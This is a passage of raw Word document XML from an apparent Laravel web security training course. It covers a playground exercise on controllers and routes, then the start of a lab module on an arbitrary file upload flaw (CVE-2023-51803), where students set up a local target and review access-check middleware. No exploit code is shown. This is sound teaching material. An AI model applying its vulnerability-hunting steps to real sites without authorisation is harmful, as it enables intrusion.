    <w:p w14:paraId="088FB778" w14:textId="338BEDEB" w:rsidR="006434C4" w:rsidRDefault="006434C4" w:rsidP="006434C4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc183609092"/>
      <w:r>
        <w:t>Create controller</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="2F303279" w14:textId="5EEEC1DA" w:rsidR="009D652E" w:rsidRDefault="009D652E" w:rsidP="00174C2D">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To create a controller, open the terminal, navigate to `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>$HOME/classroom/playground/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`, and run the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5331272E" w14:textId="77777777" w:rsidR="00F057A5" w:rsidRDefault="00F057A5" w:rsidP="00F057A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8598982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rtisan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k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controller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controlle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89F1F54" w14:textId="77777777" w:rsidR="00495940" w:rsidRDefault="00495940" w:rsidP="00F057A5">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35B55CB2" w14:textId="77777777" w:rsidR="00174C2D" w:rsidRDefault="00174C2D" w:rsidP="00F057A5">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0439037E" w14:textId="3DEAED51" w:rsidR="009D652E" w:rsidRDefault="009D652E" w:rsidP="00F057A5">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F72ED06" w14:textId="77777777" w:rsidR="00F057A5" w:rsidRDefault="00F057A5" w:rsidP="00F057A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278869762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rtisan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k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controller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ccController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DF387A3" w14:textId="38A966FB" w:rsidR="006434C4" w:rsidRDefault="006434C4" w:rsidP="009D652E">
      <w:r>
        <w:t>The command will create file `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>app/Http/Controllers/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>MccController.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425D708F" w14:textId="68B23BE4" w:rsidR="006434C4" w:rsidRDefault="006434C4" w:rsidP="006434C4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006434C4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18B08EF2" wp14:editId="46E54F71">
            <wp:extent cx="5731510" cy="1645285"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="12065"/>
            <wp:docPr id="205198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86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B3C9E" w14:textId="6F765EA7" w:rsidR="0007528F" w:rsidRDefault="006434C4" w:rsidP="0007528F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now create route GET </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>`/mcc/get</w:t>
      </w:r>
      <w:r>
        <w:t>` and the route will invoke `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>MccController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>call_get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2335DB6B" w14:textId="3FC633AB" w:rsidR="0007528F" w:rsidRDefault="0007528F" w:rsidP="0007528F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Place following code in `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>routes/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>web.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC52690" w14:textId="77777777" w:rsidR="0007528F" w:rsidRDefault="000752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170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u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pp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>\Http\Controllers\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ccControl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652CDF" w14:textId="77777777" w:rsidR="0007528F" w:rsidRDefault="000752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1703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Rou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/mcc/get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ccControl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ll_ge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5473147D" w14:textId="1FCADD30" w:rsidR="0007528F" w:rsidRDefault="0007528F" w:rsidP="006434C4">
      <w:r>
        <w:t>Now we add function in our `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0007528F">
        <w:rPr>
          <w:rStyle w:val="QuoteChar"/>
        </w:rPr>
        <w:t>MccController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473D2853" w14:textId="77777777" w:rsidR="0007528F" w:rsidRDefault="000752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23819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l_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000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> $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40C389" w14:textId="77777777" w:rsidR="0007528F" w:rsidRDefault="000752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23819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in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essage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9A07E8" w14:textId="77777777" w:rsidR="0007528F" w:rsidRDefault="000752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23819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48BD737" w14:textId="5635E012" w:rsidR="0007528F" w:rsidRDefault="0007528F" w:rsidP="00174C2D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Now browse `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>http://localhost:8888/mcc/get</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551D37BF" w14:textId="4530C8AC" w:rsidR="0007528F" w:rsidRDefault="0007528F" w:rsidP="0007528F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0007528F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B8F37E9" wp14:editId="3A800DF6">
            <wp:extent cx="5731510" cy="1391920"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="17780"/>
            <wp:docPr id="71597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73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6281F" w14:textId="78B1A472" w:rsidR="004831D4" w:rsidRDefault="004831D4" w:rsidP="004831D4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>Exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31144BB4" w14:textId="175DFF00" w:rsidR="004831D4" w:rsidRDefault="004831D4" w:rsidP="00174C2D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004831D4">
        <w:t>For the exercise, create a controller called `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>MccController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004831D4">
        <w:t>`. Then, set up two routes: one to handle a GET request and another to handle a POST request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F95EF3D" w14:textId="77777777" w:rsidR="00097C44" w:rsidRPr="00097C44" w:rsidRDefault="00097C44" w:rsidP="00097C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19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  <w:bookmarkStart w:id="36" w:name="_Toc183084834"/>
      <w:bookmarkStart w:id="37" w:name="_Toc183088385"/>
      <w:bookmarkStart w:id="38" w:name="_Toc183104423"/>
      <w:bookmarkStart w:id="39" w:name="_Toc183104737"/>
      <w:bookmarkStart w:id="40" w:name="_Toc183609093"/>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="043786B2" w14:textId="77777777" w:rsidR="00097C44" w:rsidRPr="00097C44" w:rsidRDefault="00097C44" w:rsidP="00097C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19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28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc183084835"/>
      <w:bookmarkStart w:id="42" w:name="_Toc183088386"/>
      <w:bookmarkStart w:id="43" w:name="_Toc183104424"/>
      <w:bookmarkStart w:id="44" w:name="_Toc183104738"/>
      <w:bookmarkStart w:id="45" w:name="_Toc183609094"/>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="5FCBDC33" w14:textId="77777777" w:rsidR="00097C44" w:rsidRPr="00097C44" w:rsidRDefault="00097C44" w:rsidP="00097C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc183084836"/>
      <w:bookmarkStart w:id="47" w:name="_Toc183088387"/>
      <w:bookmarkStart w:id="48" w:name="_Toc183104425"/>
      <w:bookmarkStart w:id="49" w:name="_Toc183104739"/>
      <w:bookmarkStart w:id="50" w:name="_Toc183609095"/>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="7699A36B" w14:textId="45D15DD0" w:rsidR="00097C44" w:rsidRDefault="00097C44" w:rsidP="00097C44">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>Exercise 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30565D48" w14:textId="4992B0F5" w:rsidR="00D34726" w:rsidRDefault="00097C44" w:rsidP="00097C44">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00097C44">
        <w:t>Right now, if you try to access the homepage, you</w:t>
      </w:r>
      <w:r w:rsidRPr="00097C44">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00097C44">
        <w:t>ll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00097C44">
        <w:t xml:space="preserve"> run into an error. Take some time to figure out what</w:t>
      </w:r>
      <w:r w:rsidRPr="00097C44">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00097C44">
        <w:t>s causing it and how to resolve it so you can access the page properly.</w:t>
      </w:r>
      <w:r w:rsidR="00D34726">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EADF871" w14:textId="638E7639" w:rsidR="00D34726" w:rsidRDefault="00D34726" w:rsidP="00D34726">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc183609096"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Module 1 – </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34726">
        <w:t>Arbitrary File Upload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="3B812816" w14:textId="0F4EE3E6" w:rsidR="00D34726" w:rsidRPr="0007528F" w:rsidRDefault="00451BBB" w:rsidP="00D34726">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4095FE7A" w14:textId="2454B94F" w:rsidR="00D34726" w:rsidRPr="00D34726" w:rsidRDefault="00174C2D" w:rsidP="00D34726">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00174C2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE-2023-51803</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64254EC0" w14:textId="7145A1D3" w:rsidR="00D34726" w:rsidRDefault="00174C2D" w:rsidP="00174C2D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc183609097"/>
      <w:r>
        <w:t>Getting Started</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="6D6AA492" w14:textId="2F387697" w:rsidR="00174C2D" w:rsidRDefault="00174C2D" w:rsidP="00174C2D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00174C2D">
        <w:t>For this module, the working directory is located at `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>$HOME/classroom/module-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00174C2D">
        <w:t>`. Start by navigating to this directory in your terminal. Once you're there, run the command `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>./bin/start.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00174C2D">
        <w:t>` to launch the module server. After everything is set up, the target web application will be accessible at `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>http://localhost:8888/</w:t>
      </w:r>
      <w:r w:rsidRPr="00174C2D">
        <w:t>`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EFB276" w14:textId="2D01012B" w:rsidR="00174C2D" w:rsidRDefault="00174C2D" w:rsidP="00174C2D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00174C2D">
        <w:t xml:space="preserve">Follow the same steps you used for the playground module to add the code folder into Sublime Text. Open Sublime Text, go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00174C2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File &gt; Open Folder</w:t>
      </w:r>
      <w:r w:rsidRPr="00174C2D">
        <w:t>, and then select the folder for this module, located at `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>$HOME/classroom/module-1/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00174C2D">
        <w:t>`. This will make it easier to browse and edit the code for this module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1106E1" w14:textId="63915DB4" w:rsidR="00174C2D" w:rsidRDefault="00097C44" w:rsidP="00174C2D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc183609098"/>
      <w:r>
        <w:t>Investigating The Code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="51AA381D" w14:textId="10CB16A8" w:rsidR="00140921" w:rsidRDefault="00140921" w:rsidP="007F378A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00140921">
        <w:t>The first step is to check the routing file to get an idea of what routes are available in the application. This will give you a clear picture of how the app is structured code-wise. While you're at it, make sure to note if there are any authentication checks applied to the routes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA41979" w14:textId="77777777" w:rsidR="00140921" w:rsidRDefault="00140921" w:rsidP="00140921">
      <w:r>
        <w:t>In the file `</w:t>
      </w:r>
      <w:r w:rsidRPr="00140921">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>app/Http/Controllers/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140921">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>ItemController.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">`, you'll find the following code:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFA396A" w14:textId="77777777" w:rsidR="00140921" w:rsidRDefault="001409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151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__construc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079496A" w14:textId="77777777" w:rsidR="00140921" w:rsidRDefault="001409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151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0219EF" w14:textId="77777777" w:rsidR="00140921" w:rsidRDefault="001409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151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aren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__construc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3A9C909" w14:textId="77777777" w:rsidR="00140921" w:rsidRDefault="001409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151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$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middlewa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allowed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39209BA" w14:textId="77777777" w:rsidR="00140921" w:rsidRDefault="0014092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151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341B03" w14:textId="77777777" w:rsidR="00F76484" w:rsidRDefault="00140921" w:rsidP="00140921">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This means that every time the `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140921">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>ItemController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>` is called, it will also trigger the `</w:t>
      </w:r>
      <w:r w:rsidRPr="00140921">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>allowed</w:t>
      </w:r>
      <w:r>
        <w:t>` middleware. This middleware likely handles some kind of check or restriction before the controller's methods are executed. To see what the `</w:t>
      </w:r>
      <w:r w:rsidRPr="00140921">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>allowed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">` middleware does, we need to find the file responsible for it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31196E88" w14:textId="6DB0FF03" w:rsidR="00140921" w:rsidRDefault="00140921" w:rsidP="00140921">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Since this application uses Laravel &lt; 11.x, the middleware aliases should be listed in the `</w:t>
      </w:r>
      <w:r w:rsidRPr="00140921">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>app/Http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140921">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>Kernel.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>` file. Take a look there to track down where the `</w:t>
      </w:r>
      <w:r w:rsidRPr="00140921">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>allowed</w:t>
      </w:r>
      <w:r>
        <w:t>` middleware is defined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEA4DA2" w14:textId="613D5D27" w:rsidR="00F76484" w:rsidRDefault="00F76484" w:rsidP="00140921">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A2B7ADC" wp14:editId="4281C81E">
            <wp:extent cx="5731510" cy="1201420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="961794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947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D27C" w14:textId="57588111" w:rsidR="00F76484" w:rsidRDefault="00F76484" w:rsidP="00140921">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F76484">
        <w:t>We can see that the class `</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>\App\Http\Middleware\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>CheckAllowed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76484">
        <w:t>`</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F76484">
        <w:t xml:space="preserve"> is responsible for the `</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76484">
        <w:t>` middleware. To investigate further, open the file `</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>app/Http/Middleware/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>CheckAllowed.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F76484">
        <w:t>` and check out the `handle` method. This method will contain the logic that gets executed when the middleware is triggered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6310C74C" w14:textId="20D0B64B" w:rsidR="00F76484" w:rsidRDefault="00F76484" w:rsidP="00F76484">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01EE21C2" wp14:editId="22157DB8">
            <wp:extent cx="4860249" cy="4133850"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="19050"/>
            <wp:docPr id="74704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47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5438" cy="413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25DB4" w14:textId="4BE8A0AB" w:rsidR="00F76484" w:rsidRDefault="00F76484" w:rsidP="00F76484">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F76484">
        <w:t>The check in the middleware relies on two variables: `</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>$route</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76484">
        <w:t>` and `</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F76484">
        <w:t>`. To see what values these variables hold, you can modify the code by adding `</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>dd($route);</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76484">
        <w:t>` in the `handle` method. This will dump the contents of `</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>$route</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76484">
        <w:t>` and stop the execution, allowing you to inspect its value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F10BE27" w14:textId="3AE31BE2" w:rsidR="00F76484" w:rsidRDefault="00F76484" w:rsidP="00F76484">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35B17D93" wp14:editId="7C70FCF5">
            <wp:extent cx="4182059" cy="628738"/>
            <wp:effectExtent l="19050" t="19050" r="9525" b="19050"/>
            <wp:docPr id="142322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202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28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E32F8" w14:textId="36917122" w:rsidR="00F76484" w:rsidRDefault="00F76484" w:rsidP="00F76484">
      <w:r w:rsidRPr="00F76484">
        <w:t>You can do the same with `</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F76484">
        <w:t>` by adding `</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>dd($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F76484">
        <w:rPr>
